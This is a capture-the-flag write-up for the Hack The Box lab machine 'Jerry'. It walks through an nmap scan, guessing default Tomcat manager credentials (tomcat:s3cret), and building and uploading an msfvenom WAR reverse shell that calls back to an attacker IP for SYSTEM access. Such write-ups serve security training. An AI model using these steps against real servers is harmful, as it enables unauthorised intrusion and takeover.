Jerry

Write-up for the HTB machine 'Jerry'

1. Initial recon

1.1. nmap

nmap -sC -sV 10.10.10.95 -Pn

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat

From the nmap scan we can navigate to 10.10.10.95:8080. Clicking on the manager page, we are prompted to enter some credentials. Trying the usual:

admin:admin
admin:password
...

we are met with a 403 page that contains some default credentials:

tomcat:s3cret

Sure enough, those work when we are prompted to log in again.

2. RCE

Looking through the manager portal at /manager/html, we can see that there is an option to upload WAR files. We can find an msfvenom reverse shell command for WAR files on HackTricks:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war

After uploading the reverse shell file and starting a netcat listener, we can navigate to /revshell on the web server to catch it.

3. user and root!

A simple whoami in our reverse shell reveals that we are already nt authority\system, so let's just search for our flags.

We can find them at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt, and simply running type "2 for the price of 1.txt" in the flags directory will reveal both our user and root flags.
